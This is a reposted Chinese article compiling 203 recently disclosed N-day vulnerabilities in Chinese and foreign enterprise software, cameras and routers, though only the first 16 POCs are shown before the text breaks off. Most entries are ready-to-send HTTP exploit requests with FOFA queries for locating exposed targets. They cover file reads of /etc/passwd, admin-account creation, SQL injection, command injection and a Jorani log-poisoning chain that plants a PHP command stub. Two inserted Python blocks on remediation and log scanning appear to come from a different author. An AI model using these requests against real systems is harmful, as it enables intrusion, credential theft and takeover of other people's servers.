
Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06
道一安全, 2024-06-05 07:41, Beijing
The following article is from 网络安全新视界; author: 网络安全新视界.
Purpose: exploitation of N-day vulnerabilities accounts for a large share of the attacks seen in offensive/defensive exercises. We hope this article helps defenders, who can use it to check their own assets for exposure.

Sources: the article covers 203 publicly released POCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: for space reasons, a few overly long POCs are abbreviated with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: if any of this content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate: this post is the complete list. Just search the page for the keyword you need.

Bookmark this article if it is useful to you, or follow the 网络安全新视界 public account.

Table of contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT management platform arbitrary file read
21. 大华 ICC intelligent IoT management platform random remote code execution
22. 大华 ICC intelligent IoT management platform log4j remote code execution
23. 大华 ICC intelligent IoT management platform fastjson remote code execution
24. 用友 (UFIDA) NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social business ERP validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom/broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 construction quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communication command-and-dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command-and-dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command-and-dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command-and-dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command-and-dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archive and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of a password of your choosing.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin panel with the default account admin, then send the following request. The wifiRebootrange field is passed to a shell unescaped, which is where the "; id;" lands.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained at login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

The payload is the following statement, URL-encoded twice (the application decodes the parameter a second time, which is also why a single-decoding WAF misses it):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: fetch the login page to obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value set in the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: submit the login form. The login field carries a PHP stub that runs the base64-decoded value of a request header; the failed login is written to the application log, and the language parameter is a path traversal into that log directory, so the poisoned log is later loaded as a language file.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the target to run the id command. The K1SYJPMHLU4Z header carries the command base64-encoded: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= decodes to echo ---------;id 2>&1;echo ---------; . The date in log-2023-10-24 must match the server's current date (see the Date header in the step 1 response).
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

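The chain in item 12 rests on two separate defects, and each has a straightforward fix. The following Python is an added example (not code from Jorani or from the original article) that reproduces both defects next to a hardened form in a scratch directory: unsanitised logging of the login name, and a language parameter joined onto a file path with no containment check. The directory layout, the ALLOWED_LANGUAGES set and the function names are assumptions made for the demonstration.

```python
"""Added example, not code from Jorani or the original article: the two defects
that item 12 chains, each beside a hardened form. The 'login' field is written
to the application log unsanitised (log poisoning), and the 'language' parameter
is joined onto a file path without containment, so '../../application/logs'
makes the application load the poisoned log as if it were a language file.
The directory layout and function names are assumptions for the demonstration.
"""
import os
import re
import tempfile

ALLOWED_LANGUAGES = {"en", "fr", "de"}  # assumed set of shipped translations


def resolve_language_file_vulnerable(base, language, name="global_lang.php"):
    """Path built straight from user input: '..' segments walk out of the language dir."""
    return os.path.join(base, "application", "language", language, name)


def resolve_language_file_hardened(base, language, name="global_lang.php"):
    """Whitelist the parameter, then verify the resolved path is still inside the
    language dir (defence in depth if the whitelist is ever loosened)."""
    if language not in ALLOWED_LANGUAGES:
        raise ValueError(f"unsupported language: {language!r}")
    lang_dir = os.path.realpath(os.path.join(base, "application", "language"))
    target = os.path.realpath(os.path.join(lang_dir, language, name))
    if os.path.commonpath([lang_dir, target]) != lang_dir:
        raise ValueError("path escapes language directory")
    return target


def log_failed_login_vulnerable(logfile, login):
    """Raw login string lands in the log; PHP tags inside it survive to a later include."""
    with open(logfile, "a") as fh:
        fh.write(f"ERROR - failed login for {login}\n")


def log_failed_login_hardened(logfile, login):
    """Reduce the value to a conservative username alphabet and length before logging."""
    safe = re.sub(r"[^A-Za-z0-9._@-]", "_", login)[:64]
    with open(logfile, "a") as fh:
        fh.write(f"ERROR - failed login for {safe}\n")


def demo():
    """Replay the chain in a scratch tree and report what each variant would do."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "application", "language", "en"))
    logs = os.path.join(base, "application", "logs")
    os.makedirs(logs)
    logfile = os.path.join(logs, "log-2023-10-24.php")  # date-named log, as in the POC
    # Same shape as the stub in the POC: run the base64-decoded value of a header.
    stub = "<?php if(isset($_SERVER['HTTP_X'])){system(base64_decode($_SERVER['HTTP_X']));} ?>"
    log_failed_login_vulnerable(logfile, stub)
    with open(logfile) as fh:
        poisoned = fh.read()
    traversal = "../../application/logs"
    vuln_path = os.path.normpath(
        resolve_language_file_vulnerable(base, traversal, "log-2023-10-24.php"))
    try:
        resolve_language_file_hardened(base, traversal, "log-2023-10-24.php")
        hardened_blocked = False
    except ValueError:
        hardened_blocked = True
    log_failed_login_hardened(logfile, stub)
    with open(logfile) as fh:
        sanitized_entry = fh.read().splitlines()[-1]
    return {
        "vuln_includes_log": vuln_path == os.path.normpath(logfile),
        "poisoned_has_php": "<?php" in poisoned,
        "hardened_blocked": hardened_blocked,
        "sanitized_has_php": "<?php" in sanitized_entry,
    }
```

demo() returns four booleans: the vulnerable resolver maps the traversal value onto the poisoned log file, the log entry written by the vulnerable logger contains the PHP stub, the hardened resolver rejects the traversal, and the hardened logger's entry carries no PHP tag. Either fix alone breaks the chain; both together are what a patch should contain.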
13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. This and item 14 reach the same handler: the container strips the ";.ico" matrix suffix and resolves the "/../" segment before routing, while the login check looks at the raw URI and takes the static-file suffix as a reason to skip authentication.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

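The article's stated purpose is to let defenders check their exposure, and most of the POCs above are single requests, so the practical check is to look for those request paths in web access logs. The following Python is an added example (not code from the original article or from any of the listed products) that does that over constructed sample log lines. It also makes the point behind items 14 and 15 concrete: the path the servlet container routes, with the ";.ico" matrix suffix stripped and "a.ico/../" resolved, is not the raw URI a naive authentication filter inspects, so the scanner normalises before matching and the two filter variants show the bug beside its fix. The endpoint regexes and payload indicators are taken from the POC request lines on this page (items 1 to 26); the shape of the weak filter, the STATIC_SUFFIXES list and the log lines are assumptions constructed for the example.

```python
"""Added example, not code from the original article or any listed product:
triage of web access logs against the N-day POCs above. It also shows why items
14 and 15 work: the path a servlet container routes (';.ico' matrix suffix
stripped, 'a.ico/../' resolved) differs from the raw URI a naive auth filter
sees. Signatures come from the POC request lines on this page; the weak-filter
shape and the log lines are constructed assumptions.
"""
import re
from urllib.parse import unquote, urlsplit

STATIC_SUFFIXES = (".ico", ".css", ".js", ".png")  # assumed "static, no auth" list

def fully_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded): double-encoded payloads (item 9) read in clear."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def normalize_path(path: str) -> str:
    """Approximate servlet/Spring MVC route normalisation: drop ';...' matrix
    variables from each segment, then resolve '.' and '..' segments."""
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)

def is_static_vulnerable(request_uri: str) -> bool:
    """Assumed shape of the weak filter behind items 14/15: 'static file, skip
    auth' is decided by a static suffix appearing anywhere in the raw URI."""
    return any(sfx in request_uri for sfx in STATIC_SUFFIXES)

def is_static_hardened(request_uri: str) -> bool:
    """Decide on the normalised path, refuse anything normalisation changed,
    and test the suffix on the final segment only."""
    path = request_uri.split("?", 1)[0]
    norm = normalize_path(path)
    return norm == path and norm.rsplit("/", 1)[-1].endswith(STATIC_SUFFIXES)

# Apache/Nginx combined format: ip ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Routed (normalised) paths taken from POCs on this page.
ENDPOINTS = {
    "StarRocks mem_tracker (item 1)": r"^/mem_tracker$",
    "EasyCVR adduser (item 4)": r"^/api/v1/adduser$",
    "NUUO debug utils (item 5)": r"^/__debugging_center_utils___\.php$",
    "Sangfor NGAF loadfile (item 6)": r"^/svpn_html/loadfile\.php$",
    "jshERP getAllList (items 14-15)": r"^/jshERP-boot/user/getAllList$",
    "Dahua ICC readPic (item 20)": r"^/evo-apigw/evo-cirs/file/readPic$",
    "UFIDA NC registerServlet (item 25)": r"^/portal/registerServlet$",
}
# Payload indicators, tested case-insensitively on the fully decoded target (path + query).
INDICATORS = {
    "Casdoor /static traversal (item 2)": r"^/static/\.\./",
    "dot-segment traversal (items 2, 15)": r"(^|/)\.\.(/|$)",
    "error-based SQLi (items 9, 17, 19)": r"\b(extractvalue|updatexml)\s*\(",
    "time-based SQLi (item 26)": r"\bwaitfor\s+delay\b",
    "command injection (item 5)": r"[?&]\w+=;\s*\w+",
    "JNDI lookup (items 22, 25)": r"\$\{jndi:|ldap://",
}

def scan_line(line: str):
    """Return a finding dict for one log line, or None when nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = fully_decode(m.group("target"))
    norm = normalize_path(urlsplit(decoded).path)
    hits = [lbl for lbl, rx in ENDPOINTS.items() if re.search(rx, norm)]
    hits += [lbl for lbl, rx in INDICATORS.items() if re.search(rx, decoded, re.I)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "method": m.group("method"),
            "target": m.group("target"), "normalized": norm, "hits": hits}

def scan_log(lines):
    return [f for f in map(scan_line, lines) if f]

# Constructed sample log (not real traffic); addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jun/2024:14:31:29 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jun/2024:14:31:30 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Jun/2024:14:32:01 +0800] "GET /search/index.php?keyword=%2527%2520and%2520(extractvalue(1,concat(0x7e,(select%2520user()),0x7e)))%2523 HTTP/1.1" 500 312 "-" "curl/8.0"
198.51.100.9 - - [05/Jun/2024:14:32:05 +0800] "GET /static/../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"
192.0.2.44 - - [05/Jun/2024:14:33:10 +0800] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 20 "-" "python-requests/2.31"
192.0.2.99 - - [05/Jun/2024:14:34:00 +0800] "GET /index.html HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
"""
```

Run it against real logs with scan_log(open(path)). Three habits carry over to any detection built from a list like this one: decode the target fully before matching (item 9 is double-encoded), match endpoints on the normalised path rather than the raw URI (items 14 and 15), and keep payload indicators separate from endpoint signatures, since a 200 on an unusual path is a lead even when no payload is visible. Both filter variants return True for /favicon.ico; only is_static_vulnerable also returns True for the two jshERP bypass URIs.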
16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234 (SQL Server's HASHBYTES); the hash appearing in the response confirms the injection.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
